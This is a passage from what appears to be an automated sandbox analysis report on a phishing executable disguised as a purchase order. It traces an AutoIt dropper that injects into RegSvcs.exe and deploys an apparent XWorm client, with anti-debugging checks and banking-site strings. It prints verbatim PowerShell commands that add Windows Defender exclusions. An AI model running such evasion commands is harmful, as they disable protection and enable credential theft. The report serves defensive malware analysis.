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
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\build.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_00473F09 BlockInput,

0_2_00473F09

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00403B3A

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00435A7C

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress,

0_2_00404B37

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_0057F594 mov eax, dword ptr fs:[00000030h]		0_2_0057F594
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00BB87A8 mov eax, dword ptr fs:[00000030h]		0_2_00BB87A8
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00BB9E18 mov eax, dword ptr fs:[00000030h]		0_2_00BB9E18
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00BB9E78 mov eax, dword ptr fs:[00000030h]		0_2_00BB9E78
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02F81130 mov eax, dword ptr fs:[00000030h]		0_2_02F81130
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02FC3F3D mov eax, dword ptr fs:[00000030h]		0_2_02FC3F3D
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 4_2_00A4DB28 mov eax, dword ptr fs:[00000030h]		4_2_00A4DB28
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 4_2_00A4C4B8 mov eax, dword ptr fs:[00000030h]		4_2_00A4C4B8
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 4_2_00A4DB88 mov eax, dword ptr fs:[00000030h]		4_2_00A4DB88
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 4_2_01281130 mov eax, dword ptr fs:[00000030h]		4_2_01281130
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 4_2_012C3F3D mov eax, dword ptr fs:[00000030h]		4_2_012C3F3D
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 20_2_00B11130 mov eax, dword ptr fs:[00000030h]		20_2_00B11130
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 20_2_00B53F3D mov eax, dword ptr fs:[00000030h]		20_2_00B53F3D
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 20_2_00C09570 mov eax, dword ptr fs:[00000030h]		20_2_00C09570
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 20_2_00C09510 mov eax, dword ptr fs:[00000030h]		20_2_00C09510
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 20_2_00C07EA0 mov eax, dword ptr fs:[00000030h]		20_2_00C07EA0

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_004580A9

Source: C:\Users\user\AppData\Local\Temp\build.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_0042A155
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_0042A124 SetUnhandledExceptionFilter,		0_2_0042A124
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02FC1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_02FC1361
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02FC4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_02FC4C7B
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 4_2_012C1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		4_2_012C1361
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 4_2_012C4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		4_2_012C4C7B
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 20_2_00B51361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		20_2_00B51361
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 20_2_00B54C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		20_2_00B54C7B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'

Source: C:\Users\user\AppData\Local\Temp\XClient.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	NtOpenKeyEx: Indirect: 0x140077B9B
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	NtQueryValueKey: Indirect: 0x140077C9F
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	NtClose: Indirect: 0x140077E81

Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: A81008			Jump to behavior
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 438008

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_004587B1 LogonUserW,

0_2_004587B1

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00403B3A

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_004048D7

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_00464C53 mouse_event,

0_2_00464C53

Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe"			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe "C:\Users\user\AppData\Local\antholite\exhilaratingly.exe"
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\antholite\exhilaratingly.exe"

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00457CAF

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_0045874B

Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000003.1231041983.00000000041D3000.00000004.00001000.00020000.00000000.sdmp, RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000002.1233074817.00000000004B4000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: XClient.exe, 00000007.00000002.2500110094.0000000002F56000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: XClient.exe, 00000007.00000002.2500110094.0000000002F56000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Binary or memory string: Shell_TrayWnd
Source: XClient.exe, 00000007.00000002.2500110094.0000000002F56000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager2=
Source: XClient.exe, 00000007.00000002.2500110094.0000000002F56000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: XClient.exe, 00000007.00000002.2500110094.0000000002F56000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@

Language, Device and Operating System Detection

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_0042862B cpuid

0_2_0042862B

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\alg.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\build.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\XClient.exe VolumeInformation
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
